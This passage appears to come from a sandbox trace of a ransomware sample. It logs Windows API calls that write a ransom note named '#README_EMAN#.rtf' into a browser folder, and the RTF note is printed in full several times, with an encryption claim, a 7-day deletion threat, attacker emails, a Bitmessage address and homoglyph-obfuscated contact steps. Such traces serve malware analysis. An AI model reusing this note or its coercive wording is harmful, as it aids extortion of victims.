;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.343] WriteFile (in: hFile=0x28c, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.344] CloseHandle (hObject=0x28c) returned 1 [0284.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0284.344] GetLastError () returned 0x2 [0284.344] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.509] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 